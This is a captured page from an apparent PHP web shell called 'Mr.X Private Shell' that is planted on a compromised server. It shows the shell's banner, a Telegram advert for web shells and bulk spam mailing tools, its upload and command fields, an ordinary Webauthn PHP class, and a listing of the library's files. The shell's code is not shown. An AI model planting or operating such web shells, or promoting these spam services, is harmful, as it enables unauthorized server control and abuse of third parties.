__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

declare(strict_types=1);

/*
 * The MIT License (MIT)
 *
 * Copyright (c) 2014-2019 Spomky-Labs
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */

namespace Webauthn\MetadataService;

class MetadataTOCPayload
{
    /**
     * @var string|null
     */
    private $legalHeader;

    /**
     * @var int
     */
    private $no;

    /**
     * @var string
     */
    private $nextUpdate;

    /**
     * @var MetadataTOCPayloadEntry[]
     */
    private $entries = [];

    public function getLegalHeader(): ?string
    {
        return $this->legalHeader;
    }

    public function getNo(): int
    {
        return $this->no;
    }

    public function getNextUpdate(): string
    {
        return $this->nextUpdate;
    }

    /**
     * @return MetadataTOCPayloadEntry[]
     */
    public function getEntries(): array
    {
        return $this->entries;
    }

    public static function createFromArray(array $data): self
    {
        $object = new self();
        $object->legalHeader = $data['legalHeader'] ?? null;
        $object->nextUpdate = $data['nextUpdate'] ?? null;
        $object->no = $data['no'] ?? null;
        $object->entries = [];
        if (isset($data['entries'])) {
            foreach ($data['entries'] as $k => $entry) {
                $object->entries[$k] = MetadataTOCPayloadEntry::createFromArray($entry);
            }
        }

        return $object;
    }
}

Filemanager

Name Type Size Permission Actions
AuthenticatorStatus.php File 1.23 KB 0664
BiometricAccuracyDescriptor.php File 1.72 KB 0664
BiometricStatusReport.php File 2.17 KB 0664
CodeAccuracyDescriptor.php File 1.22 KB 0664
DisplayPNGCharacteristicsDescriptor.php File 2.3 KB 0664
DistantSingleMetadata.php File 1.42 KB 0664
DistantSingleMetadataFactory.php File 1.05 KB 0664
EcdaaTrustAnchor.php File 1.43 KB 0664
ExtensionDescriptor.php File 1.17 KB 0664
MetadataService.php File 2.24 KB 0664
MetadataServiceFactory.php File 1.08 KB 0664
MetadataStatement.php File 13.02 KB 0664
MetadataStatementFetcher.php File 3.57 KB 0664
MetadataStatementRepository.php File 386 B 0664
MetadataTOCPayload.php File 1.46 KB 0664
MetadataTOCPayloadEntry.php File 3.14 KB 0664
PatternAccuracyDescriptor.php File 1.07 KB 0664
RgbPaletteEntry.php File 906 B 0664
RogueListEntry.php File 776 B 0664
SimpleMetadataStatementRepository.php File 4.6 KB 0664
SingleMetadata.php File 1.24 KB 0664
StatusReport.php File 2.39 KB 0664
VerificationMethodANDCombinations.php File 970 B 0664
VerificationMethodDescriptor.php File 2.1 KB 0664
Version.php File 778 B 0664
Filemanager